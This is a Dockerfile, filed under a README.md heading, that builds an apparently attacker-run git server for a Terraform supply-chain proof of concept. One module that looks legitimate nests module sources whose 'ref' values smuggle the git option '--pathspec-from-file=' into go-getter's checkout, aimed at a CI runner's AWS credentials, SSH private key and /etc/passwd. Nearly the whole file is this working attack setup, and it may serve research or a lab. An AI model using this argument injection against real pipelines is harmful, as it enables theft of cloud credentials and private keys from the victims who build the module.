README.md
Rendering markdown...
FROM alpine:3.20
RUN apk add --no-cache git python3
# terraform-aws-vpc-internal: minimal valid module (the one go-getter checks out with the malicious ref)
RUN git init /tmp/vpc-internal && \
cd /tmp/vpc-internal && \
git config user.email "[email protected]" && \
git config user.name "attacker" && \
printf 'output "result" { value = "ok" }\n' > main.tf && \
git add . && git commit -q -m "init" && \
git clone --bare /tmp/vpc-internal /srv/git/terraform-aws-vpc-internal.git && \
git -C /srv/git/terraform-aws-vpc-internal.git update-server-info
# terraform-aws-vpc: legitimate-looking outer module with malicious nested refs
RUN git init /tmp/vpc && \
cd /tmp/vpc && \
git config user.email "[email protected]" && \
git config user.name "attacker" && \
printf '%s\n' \
'module "creds" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"' \
'}' \
'module "key" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.ssh/id_rsa"' \
'}' \
'module "passwd" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/etc/passwd"' \
'}' > main.tf && \
git add . && git commit -q -m "init" && \
git clone --bare /tmp/vpc /srv/git/terraform-aws-vpc.git && \
git -C /srv/git/terraform-aws-vpc.git update-server-info
EXPOSE 80
WORKDIR /srv/git
CMD ["sh", "-c", "exec python3 -m http.server 80 2>/dev/null"]